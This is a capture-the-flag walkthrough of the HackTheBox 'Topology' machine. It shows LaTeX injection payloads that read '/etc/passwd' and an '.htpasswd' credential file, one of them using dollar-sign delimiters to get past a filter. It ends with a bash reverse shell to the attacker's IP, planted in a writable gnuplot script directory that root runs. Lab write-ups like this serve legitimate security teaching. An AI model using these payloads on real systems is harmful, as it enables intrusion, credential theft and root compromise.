HackTheBox : Topology

Intro:

It is a Easy Machine but new things to learn like : Latex Injection and Gnuplot PrivEsc. So let’s jump into the machine without any late.

Nmap Scan :

So as usual I start with a Nmap Scan.

Tip : nmap -sVC -T4 <ip> -vv

Nmap Scan

WEB Enumeration :

There are 2 ports running. 22 (OpenSSH) and 80 (Apache 2.4.41). So let’s visit the Website first.

This is a University website along with some professor name. But I found there is a Domain name called ‘topology.htb’ in the Email section so I add it in my ‘/etc/hosts’ file. I thought there will be some subdomain So I start a Gobuster scan for subdomai Enumeration.

Tip : gobuster vhost -u http://topology.htb/ -w <path_of_subdomain_list>

And I got two subdomain ‘dev.topology.htb’(unauthorized) and ‘stats.topology.htb’(accessable). So I add them into my host file. So Lets so to the first website where we start. I found there is ‘Latex Injection Generator’ which redirects me to a new subdomain called ‘latex.topology.htb’ so I add it in my host file and visit the website.

There is a Input Field which generate equations in .png file. As the input take only Latex code as in example so I think there can be Latex Injection or something else. Let’s check!

User Access :

So in the Input field I enter the following command.

Tip : \lstinputlisting{/etc/passwd}

Tip : Go to this website → https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection for more Information!

After that I got this output :)

This is not executing and blocked us … may be there are some kind of WAF I don’t know But we have to bypass that As a Hacker :)

I insert two ‘$’ sign first and last of the input.

Tip : $\lstinputlisting{/etc/passwd}$

And yess!!! I got the ‘/etc/passwd’ file. There are RCE. This is something new for me. :)

So what to next. I visit the ‘dev.topology.htb’ page which needs Authorization.

So we can manupulate that by ‘Latex Injection’. There might be ‘dev’ directory in victim’s machine where there will be ‘.htpasswd’ file where we can find the username and password of that page. So let’s try.

Tip : /var/www/dev/.htpasswd

Tip : $\lstinputlisting{/var/www/dev/.htpasswd}$

And I get the Username and Password_Hash.

That’s Amazing. I convert the above image into a text file from here.

And I got the password. It is an interesting password I ever seen :)

So I try to SSH it with the Credential and I get my first User Access and ‘user_flag’.

Privilege Escalation :

So it’s time for some PrivEsc. So let’s check what process are running using ‘pspy64’. Don’t forget to download it in ‘/dev/shm’ or ‘/tmp’.

Tip : pspy64 link → https://github.com/DominicBreuker/pspy

I saw a process is running as ‘gnuplot’.

GNUPLOT

Gnuplot is a command-line and GUI program that can generate two- and three-dimensional plots of functions, data, and data fits. The program runs on all major computers and operating systems.

So lets go ‘/opt/gnuplot’.

I saw ‘gnuplot’ directory has writing access so I make a reverse shell with .plt extension. The Shell Content be like:

We use only first line and we have to replace the ‘command string’ with a reverse_shell command.

Tip : “/bin/bash -c ‘bash -i >& /dev/tcp/<tun0_ip>/9001 0>&1’”

Use the above command in your shell and save it and set your Netcat listener to mentioned Port. After sometime you will get a Shell as Root.

In this way I pawned this machine. I have learned two things in this machine : Latex Injection , PrivEsc with Gnuplot.

Thanks For Reading!

Happy Hacking~